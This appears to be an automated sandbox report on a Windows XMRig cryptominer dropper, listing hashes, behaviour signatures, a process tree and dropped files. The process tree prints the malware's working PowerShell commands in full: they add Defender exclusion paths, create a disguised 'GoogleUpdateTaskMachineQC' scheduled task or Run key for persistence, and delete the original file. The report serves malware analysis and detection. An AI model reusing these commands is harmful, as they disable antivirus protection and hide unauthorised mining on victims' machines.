Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1801s
  • max time network
    1802s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3464
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Gu3PdXt79NF7EJXJ.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Gu3PdXt79NF7EJXJ.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4328
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Gu3PdXt79NF7EJXJ.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5116
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:648
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:4124
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:376
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4832
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:3076
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:488
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4656
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:3236
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:3040
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4992

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            62623d22bd9e037191765d5083ce16a3

            SHA1

            4a07da6872672f715a4780513d95ed8ddeefd259

            SHA256

            95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

            SHA512

            9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            9eb5b791c62e2394aaba3d44e1e0b082

            SHA1

            aa3636db39d21b3630f3c3f98ca122ebde17717b

            SHA256

            41afde7d9ab8d09bb1746b3a4e602fed8170a75f0bb8c7dc36b12fc2d59bded5

            SHA512

            fda6bf291a1a1844c74a29b30d21702db32ff9ec2e7870316a48da75cdfad2737c2392dd37b8989eab941961cb3a0e5537b0458b85a524528bf4617dd70aa3e9

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcjdqnyi.a1a.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/376-58-0x00007FFB68B70000-0x00007FFB69631000-memory.dmp
            Filesize

            10.8MB

          • memory/376-70-0x00007FF437960000-0x00007FF437970000-memory.dmp
            Filesize

            64KB

          • memory/376-86-0x000001D231450000-0x000001D231458000-memory.dmp
            Filesize

            32KB

          • memory/376-85-0x000001D2314A0000-0x000001D2314BA000-memory.dmp
            Filesize

            104KB

          • memory/376-84-0x000001D231440000-0x000001D23144A000-memory.dmp
            Filesize

            40KB

          • memory/376-83-0x000001D231460000-0x000001D23147C000-memory.dmp
            Filesize

            112KB

          • memory/376-82-0x000001D231010000-0x000001D23101A000-memory.dmp
            Filesize

            40KB

          • memory/376-81-0x000001D231240000-0x000001D2312F5000-memory.dmp
            Filesize

            724KB

          • memory/376-92-0x00007FFB68B70000-0x00007FFB69631000-memory.dmp
            Filesize

            10.8MB

          • memory/376-89-0x000001D216720000-0x000001D216730000-memory.dmp
            Filesize

            64KB

          • memory/376-80-0x000001D231220000-0x000001D23123C000-memory.dmp
            Filesize

            112KB

          • memory/376-69-0x000001D216720000-0x000001D216730000-memory.dmp
            Filesize

            64KB

          • memory/376-68-0x000001D216720000-0x000001D216730000-memory.dmp
            Filesize

            64KB

          • memory/376-87-0x000001D231480000-0x000001D231486000-memory.dmp
            Filesize

            24KB

          • memory/376-88-0x000001D231490000-0x000001D23149A000-memory.dmp
            Filesize

            40KB

          • memory/1436-18-0x00007FFB68B70000-0x00007FFB69631000-memory.dmp
            Filesize

            10.8MB

          • memory/1436-15-0x000001B2F0CD0000-0x000001B2F0CE0000-memory.dmp
            Filesize

            64KB

          • memory/1436-6-0x000001B2F2EC0000-0x000001B2F2EE2000-memory.dmp
            Filesize

            136KB

          • memory/1436-11-0x00007FFB68B70000-0x00007FFB69631000-memory.dmp
            Filesize

            10.8MB

          • memory/1436-14-0x000001B2F0CD0000-0x000001B2F0CE0000-memory.dmp
            Filesize

            64KB

          • memory/1436-12-0x000001B2F0CD0000-0x000001B2F0CE0000-memory.dmp
            Filesize

            64KB

          • memory/1436-13-0x000001B2F0CD0000-0x000001B2F0CE0000-memory.dmp
            Filesize

            64KB

          • memory/2760-40-0x00007FFB68B70000-0x00007FFB69631000-memory.dmp
            Filesize

            10.8MB

          • memory/2760-53-0x000001DDCACF0000-0x000001DDCAD00000-memory.dmp
            Filesize

            64KB

          • memory/2760-41-0x000001DDCACF0000-0x000001DDCAD00000-memory.dmp
            Filesize

            64KB

          • memory/2760-42-0x000001DDCACF0000-0x000001DDCAD00000-memory.dmp
            Filesize

            64KB

          • memory/2760-55-0x00007FFB68B70000-0x00007FFB69631000-memory.dmp
            Filesize

            10.8MB

          • memory/2960-39-0x00007FF6F14E0000-0x00007FF6F16F1000-memory.dmp
            Filesize

            2.1MB

          • memory/2960-34-0x00007FF6F14E0000-0x00007FF6F16F1000-memory.dmp
            Filesize

            2.1MB

          • memory/2960-0-0x00007FF6F14E0000-0x00007FF6F16F1000-memory.dmp
            Filesize

            2.1MB

          • memory/3040-148-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-166-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-192-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-190-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-188-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-186-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-184-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-182-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-180-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-178-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-176-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-174-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-172-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-170-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-168-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-164-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-129-0x0000029F6E060000-0x0000029F6E080000-memory.dmp
            Filesize

            128KB

          • memory/3040-130-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-131-0x0000029F6E220000-0x0000029F6E240000-memory.dmp
            Filesize

            128KB

          • memory/3040-162-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-133-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-135-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-136-0x0000029F6E7B0000-0x0000029F6E7D0000-memory.dmp
            Filesize

            128KB

          • memory/3040-137-0x0000029F6E7D0000-0x0000029F6E7F0000-memory.dmp
            Filesize

            128KB

          • memory/3040-160-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-139-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-140-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-142-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-143-0x0000029F6E7B0000-0x0000029F6E7D0000-memory.dmp
            Filesize

            128KB

          • memory/3040-144-0x0000029F6E7D0000-0x0000029F6E7F0000-memory.dmp
            Filesize

            128KB

          • memory/3040-146-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-158-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-150-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-152-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-154-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3040-156-0x00007FF750C60000-0x00007FF751454000-memory.dmp
            Filesize

            8.0MB

          • memory/3076-138-0x00007FF751630000-0x00007FF751646000-memory.dmp
            Filesize

            88KB

          • memory/3076-132-0x00007FF751630000-0x00007FF751646000-memory.dmp
            Filesize

            88KB

          • memory/4328-22-0x0000026FCE1F0000-0x0000026FCE200000-memory.dmp
            Filesize

            64KB

          • memory/4328-37-0x00007FFB68B70000-0x00007FFB69631000-memory.dmp
            Filesize

            10.8MB

          • memory/4328-35-0x0000026FCE1F0000-0x0000026FCE200000-memory.dmp
            Filesize

            64KB

          • memory/4328-21-0x0000026FCE1F0000-0x0000026FCE200000-memory.dmp
            Filesize

            64KB

          • memory/4328-33-0x0000026FCE1F0000-0x0000026FCE200000-memory.dmp
            Filesize

            64KB

          • memory/4328-20-0x00007FFB68B70000-0x00007FFB69631000-memory.dmp
            Filesize

            10.8MB

          • memory/4832-97-0x000001EC63820000-0x000001EC63830000-memory.dmp
            Filesize

            64KB

          • memory/4832-117-0x00007FF4DD4D0000-0x00007FF4DD4E0000-memory.dmp
            Filesize

            64KB

          • memory/4832-118-0x000001EC63820000-0x000001EC63830000-memory.dmp
            Filesize

            64KB

          • memory/4832-96-0x000001EC63820000-0x000001EC63830000-memory.dmp
            Filesize

            64KB

          • memory/4832-119-0x000001EC63820000-0x000001EC63830000-memory.dmp
            Filesize

            64KB

          • memory/4832-95-0x00007FFB68B70000-0x00007FFB69631000-memory.dmp
            Filesize

            10.8MB

          • memory/4832-121-0x00007FFB68B70000-0x00007FFB69631000-memory.dmp
            Filesize

            10.8MB

          • memory/4992-94-0x00007FF7AF1F0000-0x00007FF7AF401000-memory.dmp
            Filesize

            2.1MB

          • memory/4992-57-0x00007FF7AF1F0000-0x00007FF7AF401000-memory.dmp
            Filesize

            2.1MB

          • memory/4992-128-0x00007FF7AF1F0000-0x00007FF7AF401000-memory.dmp
            Filesize

            2.1MB